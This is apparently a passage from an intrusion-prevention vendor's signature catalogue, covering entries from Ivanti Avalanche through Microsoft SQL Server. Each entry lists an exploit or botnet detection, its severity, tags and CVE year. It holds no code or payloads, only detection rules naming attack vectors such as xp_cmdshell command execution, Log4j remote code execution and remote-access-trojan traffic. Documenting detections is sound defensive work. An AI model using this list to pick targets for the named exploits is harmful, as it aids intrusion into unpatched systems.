Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1800-5242
Last changed: sgpkg-ips-1800-5242
Vulnerability: Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference
Ivanti-Avalanche-Wlavalancheservice.exe-TV_FN-Infinite-Loop
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Vulnerability: Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1674-5242
Last changed: sgpkg-ips-1674-5242
Vulnerability: Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read
Description:
Back to top

Generic_CS-Ivanti-EPM-Agent-Portal-Command-Execution

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1803-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: Ivanti-EPM-Agent-Portal-Command-Execution
Description:
Back to top

Generic_CS-Java-Rmi-Remote-Command-Execution

About this situation: An attempt to exploit a Java Rmi Remote Command Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java SE, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: Java-Rmi-Remote-Command-Execution
Description:
Back to top

Generic_CS-Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Jenkins, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization
Jenkins-CLI-Rmi-Java-Deserialization
Description:
Back to top

Generic_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
Description:
Back to top

Generic_CS-Jimcrat-Windows-Infection-Traffic

About this situation: Jimcrat Windows infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Jimcrat-Remote-Access-Tool
Description:
Back to top

Generic_CS-Joizeparc-Linux-Infection-Traffic

About this situation: Joizeparc Linux infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Joizeparc-Botnet
Description:
Back to top

Generic_CS-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2013, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
Description:
Back to top

Generic_CS-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2013, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
Description:
Back to top

Generic_CS-Kerio-Personal-Firewall-Buffer-Overflow

About this situation: Stack buffer overflow in Kerio Personal Firewall administration authentication process.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 2000 SP4, Windows XP SP1, Windows XP SP0, Any Hardware, Kerio Personal Firewall, CVE2003, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Kerio-Personal-Firewall-Buffer-Overflow
Description:
Back to top

Generic_CS-LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LANDesk Management Suite detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, LANDesk Management Suite, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow
Description:
Back to top

Generic_CS-LCDproc-Parse_All_Client_Messages-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LCDproc detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Linux, Any Hardware, LCDproc, CVE2004, Unix not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: LCDproc-Parse_All_Client_Messages-Buffer-Overflow
Description:
Back to top

Generic_CS-LCDproc-Test-Func-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in LCDproc detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Linux, Any Hardware, LCDproc, CVE2004, Unix not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: LCDproc-Multiple-Buffer-Overflow-Vulnerabilities
Description:
Back to top

Generic_CS-LCDproc-Test_Func-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in LCDproc detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Linux, Any Hardware, LCDproc, CVE2004, Unix not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: LCDproc-Test_Func-Format-String-Vulnerability
Description:
Back to top

Generic_CS-Lethic-Activity

About this situation: Lethic activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Lethic
Description:
Back to top

Generic_CS-Lianja-SQL-DbNetserver-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Lianja SQL Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Lianja SQL Server, CVE2013, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: Lianja-SQL-DbNetserver-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in LibVNCServer Development Team LibVNCServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, LibVNCServer, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Vulnerability: Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service
Description:
Back to top

Generic_CS-Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free

About this situation: An attempt to exploit a vulnerability in LibVNCServer Development Team LibVNCServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, LibVNCServer, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free
Description:
Back to top

Generic_CS-Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LibVNCServer Development Team LibVNCServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, LibVNCServer, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Linksys-WAP610N-Unauthenticated-Root-Access

About this situation: An attempt to exploit a vulnerability in Linksys WAP610N detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Linksys WAP610N, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: Linksys-WAP610N-Unauthenticated-Root-Access
Description:
Back to top

Generic_CS-Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2013, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-534-5211
Vulnerability: Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Linux-Kernel-Nfsd-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the NFS component of the Linux kernel detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, linux NFS utils, CVE2022, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: Linux-Kernel-Nfsd-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-LoadRunner-magentproc.exe-Stack-Buffer-Overflow

About this situation: A LoadRunner magentproc.exe Stack Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP LoadRunner, CVE2013, Windows not specific, HP LoadRunner not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: LoadRunner-magentproc.exe-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Log4j-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Log4j detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1414-5242
Last changed: sgpkg-ips-1419-5242
Vulnerability: Log4j-Remote-Code-Execution
Description:
Back to top

Generic_CS-Lolibotinc-Linux-Infection-Traffic

About this situation: Lolibotinc Linux infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Lolibotinc-Botnet
Description:
Back to top

Generic_CS-Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service

About this situation: A Macromedia Flash Media Server Administration Service Denial of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Macromedia Flash Media Server, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service
Description:
Back to top

Generic_CS-Manutharcs-Linux-Infection-Traffic

About this situation: Manutharcs Linux infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Manutharcs-Botnet
Description:
Back to top

Generic_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in McAfee Framework Services used in McAfee ePolicy Orchestrator and other products detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, McAfee ePolicy Orchestrator, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-404-4219
Vulnerability: McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
Description:
Back to top

Generic_CS-Measuresoft-ScadaPro-Directory-Traversal

About this situation: A vulnerability in Measuresoft ScadaPro detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Measuresoft ScadaPro, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Measuresoft-ScadaPro-Directory-Traversal
Description:
Back to top

Generic_CS-Measuresoft-ScadaPro-Remote-Code-Execution

About this situation: A vulnerability in Measuresoft ScadaPro detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Measuresoft ScadaPro, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Measuresoft-ScadaPro-Remote-Code-Execution
Description:
Back to top

Generic_CS-Measuresoft-ScadaPro-XF-Command-Execution

About this situation: An attempt to exploit a vulnerability in Measuresoft ScadaPro detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Measuresoft ScadaPro, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1621-5242
Vulnerability: Measuresoft-ScadaPro-XF-Command-Execution
Description:
Back to top

Generic_CS-Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225

About this situation: An attempt to exploit a code execution vulnerability in Microsoft Windows Media Player detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-347-4219
Last changed: sgpkg-ips-347-4219
Vulnerability: Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225
Description:
Back to top

Generic_CS-Media-Services-Buffer-Overflow-CVE-2010-0478

About this situation: An attempt to exploit CVE-2010-0478 over TCP detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 2000, Any Hardware, MS2010-04, CVE2010, Windows 2000 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-302-4219
Vulnerability: Media-Services-Buffer-Overflow-CVE-2010-0478
Description:
Back to top

Generic_CS-Media-Services-Buffer-Overflow-Exploit-CVE-2010-0478

About this situation: An exploit targeting CVE-2010-0478 detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows 2000, Any Hardware, MS2010-04, CVE2010, Windows 2000 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-302-4219
Last changed: sgpkg-ips-302-4219
Vulnerability: Media-Services-Buffer-Overflow-CVE-2010-0478
Description:
Back to top

Generic_CS-Memcached-Add-Request

About this situation: A memcached add request was detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Memcached, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Memcached-Usage
Description:
Back to top

Generic_CS-Memcached-Denial-Of-Service

About this situation: An attempt to exploit a Memcached Denial Of Service vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Memcached, CVE2011, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-713-5211
Vulnerability: Memcached-Denial-Of-Service
Description:
Back to top

Generic_CS-Memcached-Get-Request

About this situation: A memcached get request was detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Memcached, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-600-5211
Vulnerability: Memcached-Usage
Description:
Back to top

Generic_CS-Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Memcached
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Memcached, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1170-5242
Last changed: sgpkg-ips-1170-5242
Vulnerability: Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service
Description:
Back to top

Generic_CS-Memcached-Process_Bin_Append_Prepend-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Memcached Project Memcached detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Memcached, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: Memcached-Process_Bin_Append_Prepend-Integer-Overflow
Description:
Back to top

Generic_CS-Memcached-Process_Bin_SASL_Auth-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Memcached Project Memcached detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Memcached, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1378-5242
Vulnerability: Memcached-Process_Bin_SASL_Auth-Integer-Underflow
Description:
Back to top

Generic_CS-Memcached-Process_Bin_Update-Body_Len-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Memcached Project Memcached detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Memcached, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-825-5242
Vulnerability: Memcached-Process_Bin_Update-Body_Len-Integer-Overflow
Description:
Back to top

Generic_CS-Memcached-Set-Request

About this situation: A memcached set request was detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Memcached, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-600-5211
Vulnerability: Memcached-Usage
Description:
Back to top

Generic_CS-Memcached-Suspicious-Bind-Command

About this situation: A suspicous memcached bind command was detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, MySQL, CVE2013, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-999-5242
Vulnerability: Oracle-Mysql-Server-Innodb-Memcached-Plugin-Resource-Exhaustion
Description:
Back to top

Generic_CS-Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Memcached Project Memcached detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Memcached, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1241-5242
Vulnerability: Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Metasploit-msfd-Remote-Code-Execution

About this situation: A Metasploit msfd Remote Code Execution Vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Metasploit, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Vulnerability: Metasploit-msfd-Remote-Code-Execution
Description:
Back to top

Generic_CS-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Microsoft Active Directory on Windows 2000 Server platform detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 2000, Any Hardware, MS2008-10, CVE2008, Windows 2000 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-179-2032
Vulnerability: LDAP-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
Description:
Back to top

Generic_CS-Microsoft-DirectPlay-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2004-06, CVE2004, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Microsoft-DirectPlay-Denial-Of-Service
Description:
Back to top

Generic_CS-Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS

About this situation: An attempt to exploit a vulnerability in Microsoft Host Integration Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft Host Integration Server, MS2011-10, CVE2011, Windows not specific, Microsoft Host Integration Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS
Description:
Back to top

Generic_CS-Microsoft-IIS-Schannel-Improper-Certificate-Verification

About this situation: An attempt to exploit a Microsoft IIS Schannel Improper Certificate Verification vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft IIS SChannel, MS2009-03, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Microsoft-IIS-Schannel-Improper-Certificate-Verification
Description:
Back to top

Generic_CS-Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, CVE2004, Any Operating System not specific, Internet Explorer not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-518-5211
Vulnerability: Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal
Description:
Back to top

Generic_CS-Microsoft-Message-Queuing-Binary-Protocol-Usage

About this situation: Microsoft Message Queuing usage detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Windows, Any Hardware, MS2024-12, CVE2024, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1809-5242
Last changed: sgpkg-ips-1809-5242
Vulnerability: Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-49122
Description:
Back to top

Generic_CS-Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554

About this situation: An attempt to exploit a vulnerability in Microsoft Message Queuing detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2023-04, CVE2023, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554
Description:
Back to top

Generic_CS-Microsoft-SQL-Server-Payload-Execution

About this situation: An attempt to exploit a Microsoft SQL Server Payload Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, CVE2000, Windows not specific, Microsoft SQL Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: Microsoft-SQL-Server-Payload-Execution
Description:
Back to top

Generic_CS-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution

About this situation: Detects attempts to execute operating system commands via xp_cmdshell
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server, Windows 2000 not specific, Windows NT 4.0 not specific, Microsoft SQL Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
Description:
Back to top

